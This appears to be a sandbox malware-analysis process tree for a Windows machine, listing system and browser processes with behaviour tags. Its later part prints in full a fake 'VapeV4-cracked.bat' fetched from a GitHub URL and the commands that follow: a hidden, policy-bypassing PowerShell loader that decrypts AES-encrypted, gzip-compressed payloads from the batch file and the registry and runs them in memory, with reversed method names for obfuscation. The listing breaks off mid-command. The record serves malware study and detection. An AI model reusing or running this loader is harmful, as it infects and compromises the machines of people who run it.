C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1696

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2688

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2984

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3336

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8451f46f8,0x7ff8451f4708,0x7ff8451f4718
3⤵
PID:2656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
3⤵
PID:3936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
3⤵
PID:4564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
3⤵
PID:4400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
3⤵
PID:3940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
3⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5180 /prefetch:8
3⤵
PID:1608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
3⤵
PID:1820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\VapeV4-cracked.bat" "
2⤵
- Drops file in Windows directory
PID:2400

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:856

C:\Windows\system32\net.exe
net session
3⤵
PID:4884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
4⤵
PID:4468

C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe
"VapeV4-cracked.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function DlXiw($jnfYj){ $QpJJS=[System.Security.Cryptography.Aes]::Create(); $QpJJS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QpJJS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QpJJS.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hq6nkjA2Agpp6rzE5ZH6qEdc87VQUGJSupueX0Nn2kI='); $QpJJS.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yCS6Miz0G0oYyOqVwRYRZw=='); $GHgia=$QpJJS.CreateDecryptor(); $return_var=$GHgia.TransformFinalBlock($jnfYj, 0, $jnfYj.Length); $GHgia.Dispose(); $QpJJS.Dispose(); $return_var;}function cuzkB($jnfYj){ $vMlyC=New-Object System.IO.MemoryStream(,$jnfYj); $jWECR=New-Object System.IO.MemoryStream; $xNVjy=New-Object System.IO.Compression.GZipStream($vMlyC, [IO.Compression.CompressionMode]::Decompress); $xNVjy.CopyTo($jWECR); $xNVjy.Dispose(); $vMlyC.Dispose(); $jWECR.Dispose(); $jWECR.ToArray();}function htDyt($jnfYj,$nQBBf){ $ryoCK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$jnfYj); $HgyeT=$ryoCK.EntryPoint; $HgyeT.Invoke($null, $nQBBf);}$zXORP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\VapeV4-cracked.bat').Split([Environment]::NewLine);foreach ($pJAbE in $zXORP) { if ($pJAbE.StartsWith('SEROXEN')) { $VXJBB=$pJAbE.Substring(7); break; }}$pogEs=[string[]]$VXJBB.Split('\');$WRGtE=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[0])));$HmueV=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[1])));htDyt $HmueV (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));htDyt $WRGtE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function LmYrU($GlYrr){ $VzjlJ=[System.Security.Cryptography.Aes]::Create(); $VzjlJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VzjlJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VzjlJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c='); $VzjlJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A=='); $TOsgU=$VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')(); $PsSSM=$TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlYrr, 0, $GlYrr.Length); $TOsgU.Dispose(); $VzjlJ.Dispose(); $PsSSM;}function QfZmt($GlYrr){ $nVolF=New-Object System.IO.MemoryStream(,$GlYrr); $VTMYb=New-Object System.IO.MemoryStream; $nmqaP=New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::Decompress); $nmqaP.CopyTo($VTMYb); $nmqaP.Dispose(); $nVolF.Dispose(); $VTMYb.Dispose(); $VTMYb.ToArray();}function szqwG($GlYrr,$NEZvQ){ $ewoEL=[System.Reflection.Assembly]::Load([byte[]]$GlYrr); $HogUs=$ewoEL.EntryPoint; $HogUs.Invoke($null, $NEZvQ);}$VzjlJ1 = New-Object System.Security.Cryptography.AesManaged;$VzjlJ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$RyjbI = $VzjlJ1.('rotpyrceDetaerC'[-1..-15] -join '')();$WeCRB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rBC5HeHuGbR2ImUlWvTjSQ==');$WeCRB = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB, 0, $WeCRB.Length);$WeCRB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB);$bcFyd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BeaC7G+8Sm7rfYF70uj8+9TzFxmZEiUlsh2TM2xk1+A=');$bcFyd = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bcFyd, 0, $bcFyd.Length);$bcFyd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bcFyd);$yAHNg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ws3lAmjqLeV7orzZ/YWfPA==');$yAHNg = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yAHNg, 0, $yAHNg.Length);$yAHNg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yAHNg);$GzAMm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9YHl/b5X5ofe5n03Kerdh4fWRBxD0pX/SyLJUbzj2faRL6Qv9I9FCsrMwAk51NtgwviquEUBf774rXrYKUifdVSqSsjl2PnjYtC2Yif3g5oJQam2JhnRb/z9GIuB4etIiFGPLnhL7UgGxYr7DnbGDSi047eI/se79omdwxjPoPB7UTuOy824vLyL3bFw2frZJivPSph2HigUMsOKrI62VbZI6JY7T7bv8UjzSWfjrUhkZnJskkh5kcfdcX+A8XqeF/31RfDl5c5DHPnxu/BhJQmiutTpgmHEZ8pxw8KX7/WpeWJCCD9sD6u8SmgoJdMtkYDfo3NQnikVbk0RJeEDo5UR5p3qRCnPLBer93JUiV2p08BlQVV05Qsbgs+fHf8snJ0RpUq+FXqVWV/6CuV8UnlIPNfRNLCyAi25F5kCS8E=');$GzAMm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GzAMm, 0, $GzAMm.Length);$GzAMm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GzAMm);$AoGah = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VPLPBd2r41JicJsw8HEb8g==');$AoGah = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AoGah, 0, $AoGah.Length);$AoGah = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AoGah);$lgDvm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mr61btMD3+k5y48OeMz7Iw==');$lgDvm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lgDvm, 0, $lgDvm.Length);$lgDvm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lgDvm);$tqVXJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0cpebOCRE4vOUJtETKRgLw==');$tqVXJ = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tqVXJ, 0, $tqVXJ.Length);$tqVXJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tqVXJ);$LPaqK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4UbNTOvYCuJ3aS365B1ljg==');$LPaqK = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LPaqK, 0, $LPaqK.Length);$LPaqK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LPaqK);$EGznT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oQJLBF9lcvxb1b9b+hMFxQ==');$EGznT = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EGznT, 0, $EGznT.Length);$EGznT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EGznT);$WeCRB0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0bvuVlAbojoct73Wd6OFLQ==');$WeCRB0 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB0, 0, $WeCRB0.Length);$WeCRB0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB0);$WeCRB1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fnpxdZjqORDfNgWX1H/Pfw==');$WeCRB1 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB1, 0, $WeCRB1.Length);$WeCRB1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB1);$WeCRB2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HVF+C560xar/hFyTSm9+FQ==');$WeCRB2 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB2, 0, $WeCRB2.Length);$WeCRB2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB2);$WeCRB3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9OSzDNwsyhvLGrn+9PwCOw==');$WeCRB3 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB3, 0, $WeCRB3.Length);$WeCRB3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB3);$RyjbI.Dispose();$VzjlJ1.Dispose();if (@(get-process -ea silentlycontinue $WeCRB3).count -gt 1) {exit};$hbRRw = [Microsoft.Win32.Registry]::$LPaqK.$tqVXJ($WeCRB).$lgDvm($bcFyd);$XRetW=[string[]]$hbRRw.Split('\');$YrtyT=QfZmt(LmYrU([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[1])));szqwG $YrtyT (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$hYivz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[0]);$VzjlJ = New-Object System.Security.Cryptography.AesManaged;$VzjlJ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$TOsgU = $VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYivz = $TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYivz, 0, $hYivz.Length);$TOsgU.Dispose();$VzjlJ.Dispose();$nVolF = New-Object System.IO.MemoryStream(, $hYivz);$VTMYb = New-Object System.IO.MemoryStream;$nmqaP = New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::$WeCRB1);$nmqaP.$EGznT($VTMYb);$nmqaP.Dispose();$nVolF.Dispose();$VTMYb.Dispose();$hYivz = $VTMYb.ToArray();$iouAf = $GzAMm | IEX;$ewoEL = $iouAf::$WeCRB2($hYivz);$HogUs = $ewoEL.EntryPoint;$HogUs.$WeCRB0($null, (, [string[]] ($yAHNg)))
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3416

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3416).WaitForExit();[System.Threading.Thread]::Sleep(5000); function LmYrU($GlYrr){ $VzjlJ=[System.Security.Cryptography.Aes]::Create(); $VzjlJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VzjlJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VzjlJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c='); $VzjlJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A=='); $TOsgU=$VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')(); $PsSSM=$TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlYrr, 0, $GlYrr.Length); $TOsgU.Dispose(); $VzjlJ.Dispose(); $PsSSM;}function QfZmt($GlYrr){ $nVolF=New-Object System.IO.MemoryStream(,$GlYrr); $VTMYb=New-Object System.IO.MemoryStream; $nmqaP=New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::Decompress); $nmqaP.CopyTo($VTMYb); $nmqaP.Dispose(); $nVolF.Dispose(); $VTMYb.Dispose(); $VTMYb.ToArray();}function szqwG($GlYrr,$NEZvQ){ $ewoEL=[System.Reflection.Assembly]::Load([byte[]]$GlYrr); $HogUs=$ewoEL.EntryPoint; $HogUs.Invoke($null, $NEZvQ);}$VzjlJ1 = New-Object System.Security.Cryptography.AesManaged;$VzjlJ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$RyjbI = $VzjlJ1.('rotpyrceDetaerC'[-1..-15] -join '')();$WeCRB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rBC5HeHuGbR2ImUlWvTjSQ==');$WeCRB = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB, 0, $WeCRB.Length);$WeCRB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB);$bcFyd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BeaC7G+8Sm7rfYF70uj8+9TzFxmZEiUlsh2TM2xk1+A=');$bcFyd = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bcFyd, 0, $bcFyd.Length);$bcFyd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bcFyd);$yAHNg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ws3lAmjqLeV7orzZ/YWfPA==');$yAHNg = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yAHNg, 0, $yAHNg.Length);$yAHNg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yAHNg);$GzAMm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9YHl/b5X5ofe5n03Kerdh4fWRBxD0pX/SyLJUbzj2faRL6Qv9I9FCsrMwAk51NtgwviquEUBf774rXrYKUifdVSqSsjl2PnjYtC2Yif3g5oJQam2JhnRb/z9GIuB4etIiFGPLnhL7UgGxYr7DnbGDSi047eI/se79omdwxjPoPB7UTuOy824vLyL3bFw2frZJivPSph2HigUMsOKrI62VbZI6JY7T7bv8UjzSWfjrUhkZnJskkh5kcfdcX+A8XqeF/31RfDl5c5DHPnxu/BhJQmiutTpgmHEZ8pxw8KX7/WpeWJCCD9sD6u8SmgoJdMtkYDfo3NQnikVbk0RJeEDo5UR5p3qRCnPLBer93JUiV2p08BlQVV05Qsbgs+fHf8snJ0RpUq+FXqVWV/6CuV8UnlIPNfRNLCyAi25F5kCS8E=');$GzAMm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GzAMm, 0, $GzAMm.Length);$GzAMm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GzAMm);$AoGah = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VPLPBd2r41JicJsw8HEb8g==');$AoGah = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AoGah, 0, $AoGah.Length);$AoGah = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AoGah);$lgDvm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mr61btMD3+k5y48OeMz7Iw==');$lgDvm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lgDvm, 0, $lgDvm.Length);$lgDvm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lgDvm);$tqVXJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0cpebOCRE4vOUJtETKRgLw==');$tqVXJ = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tqVXJ, 0, $tqVXJ.Length);$tqVXJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tqVXJ);$LPaqK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4UbNTOvYCuJ3aS365B1ljg==');$LPaqK = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LPaqK, 0, $LPaqK.Length);$LPaqK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LPaqK);$EGznT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oQJLBF9lcvxb1b9b+hMFxQ==');$EGznT = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EGznT, 0, $EGznT.Length);$EGznT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EGznT);$WeCRB0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0bvuVlAbojoct73Wd6OFLQ==');$WeCRB0 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB0, 0, $WeCRB0.Length);$WeCRB0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB0);$WeCRB1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fnpxdZjqORDfNgWX1H/Pfw==');$WeCRB1 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB1, 0, $WeCRB1.Length);$WeCRB1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB1);$WeCRB2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HVF+C560xar/hFyTSm9+FQ==');$WeCRB2 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB2, 0, $WeCRB2.Length);$WeCRB2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB2);$WeCRB3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9OSzDNwsyhvLGrn+9PwCOw==');$WeCRB3 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB3, 0, $WeCRB3.Length);$WeCRB3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB3);$RyjbI.Dispose();$VzjlJ1.Dispose();if (@(get-process -ea silentlycontinue $WeCRB3).count -gt 1) {exit};$hbRRw = [Microsoft.Win32.Registry]::$LPaqK.$tqVXJ($WeCRB).$lgDvm($bcFyd);$XRetW=[string[]]$hbRRw.Split('\');$YrtyT=QfZmt(LmYrU([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[1])));szqwG $YrtyT (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$hYivz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 